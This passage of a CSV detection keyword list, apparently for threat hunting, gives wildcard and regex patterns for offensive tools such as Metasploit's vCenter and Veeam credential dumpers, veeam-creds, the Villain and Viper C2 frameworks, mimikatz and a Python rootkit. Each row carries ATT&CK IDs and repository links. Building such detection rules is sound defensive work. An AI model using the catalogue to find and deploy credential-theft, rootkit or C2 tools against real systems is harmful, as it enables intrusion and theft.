TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vcenter_secrets_dump.*",".{0,1000}vcenter_secrets_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vcenter_secrets_dump.rb*",".{0,1000}vcenter_secrets_dump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*vcsmap*",".{0,1000}vcsmap.{0,1000}","offensive_tool_keyword","vcsmap","vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.","T1210.001 - T1190 - T1538","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/melvinsh/vcsmap","1","0","N/A","N/A","2","134","23","2021-08-31T20:47:07Z","2016-08-21T11:23:57Z" "*vdi2john.pl*",".{0,1000}vdi2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*VectorKernel\BlockNewProc*",".{0,1000}VectorKernel\\BlockNewProc.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*VectorKernel\CreateToken*",".{0,1000}VectorKernel\\CreateToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*VectorKernel\ModHide*",".{0,1000}VectorKernel\\ModHide.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*VectorKernel\StealToken*",".{0,1000}VectorKernel\\StealToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*VectorKernel-main.zip*",".{0,1000}VectorKernel\-main\.zip.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*vectra-ai-research/MAAD-AF*",".{0,1000}vectra\-ai\-research\/MAAD\-AF.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*veeam_credential_dump.*",".{0,1000}veeam_credential_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*veeam_dump*",".{0,1000}veeam_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*veeam_dump_mssql.ps1*",".{0,1000}veeam_dump_mssql\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*veeam_dump_postgresql.ps1*",".{0,1000}veeam_dump_postgresql\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*veeam-creds-main*",".{0,1000}veeam\-creds\-main.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*Veeam-Get-Creds.ps1*",".{0,1000}Veeam\-Get\-Creds\.ps1.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*VeeamGetCreds.yaml*",".{0,1000}VeeamGetCreds\.yaml.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*veeampot.py*",".{0,1000}veeampot\.py.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*Vegile -*",".{0,1000}Vegile\s\-.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","0","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*Venom Admin Node Start*",".{0,1000}Venom\sAdmin\sNode\sStart.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*Venom\agent\agent.go*",".{0,1000}Venom\\agent\\agent\.go.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*venv wapiti3*",".{0,1000}venv\swapiti3.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*Verified Merlin server *",".{0,1000}Verified\sMerlin\sserver\s.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*verovaleros/domain_analyzer*",".{0,1000}verovaleros\/domain_analyzer.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*vh.4everproxy.com/secure/*",".{0,1000}vh\.4everproxy\.com\/secure\/.{0,1000}","offensive_tool_keyword","4everproxy","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://www.4everproxy.com/","1","1","this pattern could be observed in any proxyfied site","6","10","N/A","N/A","N/A","N/A" "*victim_host_generator.py*",".{0,1000}victim_host_generator\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*VID_03EB&PID_2403 *",".{0,1000}VID_03EB\&PID_2403\s.{0,1000}","offensive_tool_keyword","ducky","rubber ducky","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki","1","0","default vid and pid of the device - risk of false positives","10","1","2","0","2015-03-15T02:45:33Z","2015-03-15T02:45:31Z" "*VID_0483&PID_5740*",".{0,1000}VID_0483\&PID_5740.{0,1000}","offensive_tool_keyword","FlipperZero","Flipper ZeroFlipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://docs.flipper.net/qflipper/windows-debug","1","0","default vid and pid of the device - risk of false positives","10","10","N/A","N/A","N/A","N/A" "*viewdns-get-rootdomains-ip-ns *",".{0,1000}viewdns\-get\-rootdomains\-ip\-ns\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*viewdns-get-rootdomains-whois *",".{0,1000}viewdns\-get\-rootdomains\-whois\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*Villain.git*",".{0,1000}Villain\.git.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*villain.py*",".{0,1000}villain\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*Villain/Core*",".{0,1000}Villain\/Core.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*villain_core.py*",".{0,1000}villain_core\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*vil-proxy/quickcert*",".{0,1000}vil\-proxy\/quickcert.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*vincent.letoux@gmail.com*",".{0,1000}vincent\.letoux\@gmail\.com.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*viper/*.sock*",".{0,1000}viper\/.{0,1000}\.sock.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*viper-dev.conf*",".{0,1000}viper\-dev\.conf.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*viperpython-dev*",".{0,1000}viperpython\-dev.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*viperpython-main*",".{0,1000}viperpython\-main.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*viperzip.exe*",".{0,1000}viperzip\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*virajkulkarni14*",".{0,1000}virajkulkarni14.{0,1000}","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/virajkulkarni14","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Viralmaniar*",".{0,1000}Viralmaniar.{0,1000}","offensive_tool_keyword","Github Username","github username hosting post exploitation tools and recon tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Viralmaniar","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*VirTool:PowerShell/Scanpatch.A*",".{0,1000}VirTool\:PowerShell\/Scanpatch\.A.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*virtual-host-enumeration.py*",".{0,1000}virtual\-host\-enumeration\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*viRu5/GoogleChromeAutoLaunch.py*",".{0,1000}viRu5\/GoogleChromeAutoLaunch\.py.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*viRu5\GoogleChromeAutoLaunch.py*",".{0,1000}viRu5\\GoogleChromeAutoLaunch\.py.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*virusscan_bypass.rb*",".{0,1000}virusscan_bypass\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*VirusTotalC2.*",".{0,1000}VirusTotalC2\..{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","7","82","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*Visual-Studio-BOF-template*",".{0,1000}Visual\-Studio\-BOF\-template.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*VITE_STRIKER_API*",".{0,1000}VITE_STRIKER_API.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*vletoux/MakeMeEnterpriseAdmin*",".{0,1000}vletoux\/MakeMeEnterpriseAdmin.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*vletoux/NTLMInjector*",".{0,1000}vletoux\/NTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*VlZSS2VrMVdWa2RhTTJScFVtdGFXbFJWWkc5VlZscFZVbXhLWVUxVlNsVlZWbU14V1ZVeGNXSkVTbGhoYTI4d1dXdGFjbVZYUmtsaVIyeE9ZV3RhZWxZeFdtOVdNREZJVTJwV1QxZElRbWhXTUZaMlpWWmtjMXBJVG14V2JYY3hWR3hrZDJGVk1YRlJibFpTVFc1Uk1GVXhXbEpsUmxKelZtdHdVMUpGU25WVk1qVjNVbXMxVmsxWVFrOVRSMmhRV1ZjeGEwMVdVbGRVVkVKc*",".{0,1000}VlZSS2VrMVdWa2RhTTJScFVtdGFXbFJWWkc5VlZscFZVbXhLWVUxVlNsVlZWbU14V1ZVeGNXSkVTbGhoYTI4d1dXdGFjbVZYUmtsaVIyeE9ZV3RhZWxZeFdtOVdNREZJVTJwV1QxZElRbWhXTUZaMlpWWmtjMXBJVG14V2JYY3hWR3hrZDJGVk1YRlJibFpTVFc1Uk1GVXhXbEpsUmxKelZtdHdVMUpGU25WVk1qVjNVbXMxVmsxWVFrOVRSMmhRV1ZjeGEwMVdVbGRVVkVKc.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" 